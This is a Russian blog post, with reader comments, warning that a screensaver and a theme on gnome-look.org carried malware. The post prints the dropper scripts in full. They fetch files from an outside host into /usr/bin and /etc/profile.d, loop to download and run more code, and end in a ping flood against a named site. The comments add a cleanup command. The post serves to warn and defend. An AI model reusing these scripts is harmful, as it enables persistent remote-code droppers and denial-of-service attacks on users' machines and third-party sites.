Блог им. Jolly_RogerНе всё то золото, что блестит на gnome-look.org

За последние несколько дней, на популярном для гномоводов сайте, обнаружено уже 2 пакета содержащие вредоносные скрипты: скринсейвер WaterFall и тема оформления Ninja (на данный момент контент изъят).
В комплекте с украшательствами шло:
Скрипт:
1 #!/bin/sh
2 cd /usr/bin/
3 rm Auto.bash
4 sleep 1
5 wget http://05748.t35.com/Bots/Auto.bash
6 chmod 777 Auto.bash
7 echo -----------------
8 cd /etc/profile.d/
9 rm gnome.sh
10 sleep 1
11 wget http://05748.t35.com/Bots/gnome.sh
12 chmod 777 gnome.sh
13 echo -----------------
14 clear
15 exit


Содержание скрипта Auto.bash:
1 while :
2 do
3 rm /usr/bin/run.bash
4 cd /usr/bin/
5 wget http://05748.t35.com/Bots/index.php
6 wget http://05748.t35.com/Bots/run.bash
7 sleep 4
8 rm index.php
9 chmod 755 run.bash
10 command -p /usr/bin/run.bash
11 done


В конечном итоге выполнялась команда:
ping -s 65507 www.mmowned.com


С помощью такого незамысловатого кода, вполне возможно, была попытка формирования ботнета.
Аккуратнее с незнакомым ПО! Обиднее всего, что скомпрометирован известный ресурс, которым сам пользуюсь время от времени.

Комментарии (18)

Для удаления трояна требуется ввести команду:
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
© Habrahabr
А это было на Хабре? Не знал, можно ссылку?
Команда хорошая, для тех кто в курсе, что у него троян.
на наверное теперь уже знают те, кто устанавливал себе эти штуки :)
на хабре вот тут это было
пост написан раньше вас на две минуты :)
Спасибо. Я с утра решал стоит ли постить сюда, потом решил, что стоит.
конечно стоит. Не понимаю в чем тут могли быть сомнения)
Я тут человек новый, теги «безопасность» или «security» в глаза не бросились — мало ли. Да и от природы скромен, пока не выпью чего-нибудь тонизирующего ).
:) это и хорошо в какой-то мере.
Похоже появился единственный троян для линухи, который не нужно специально допиливать напильником чтобы запустить.
все ещё впереди :) чем больше будет появляться пользователей, которые не понимают ничего, тем больше таких вот ситуаций будет возникать. Ведь пользователь глубоко плюет, на то что ему говорят устанавливать только из родных репозиториев, а иначе сначала проверять что творится, прежде чем ставить.
я не имел ввиду пользователей (как в офисе например) за которых все настроили и ограничили права. А тех, которые сами себе поставили (или кто-то им поставил) и не обрезал права, и рассказал где рут :)
Боюсь, что тут проблема с пользователями как раз все понимающими. Еще несколько лет назад мало-мальски уважающий себя хакер (ну, мне так представлялось) не гадил у себя дома — то есть, не писал деструкторы под Линукс. Сегодня — мы на форумах объясняем, пришедшим с Виндоуз мальчуганам, что и где лежит в никсах, а завтра они начинают писать вирусы. Причем ассемблер, с его требованием к кодеру, уже не нужен. Что будет дальше — не решусь предсказывать.
я не про написание вирусов говорил, а про то кто их будет у себя «запускать». Если не будет вторых, то не будет и первых.
«Вторые» всегда будут, к сожалению.
это конечно да, вопрос количества.
Вот тут, я практически уверен, их количество будет только повышаться с «десктопностью» и «дружелюбностью» никсов. Имеем ту самую палку с двумя концами.
«И радует и в сердце тревога». Не знаю кто сказал — наверно я ).
что-то неожиданно для меня, у нас с Вами спора не получается :)
Полносью согласен.
А надо было? =)
ну обычно так и получается :)
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.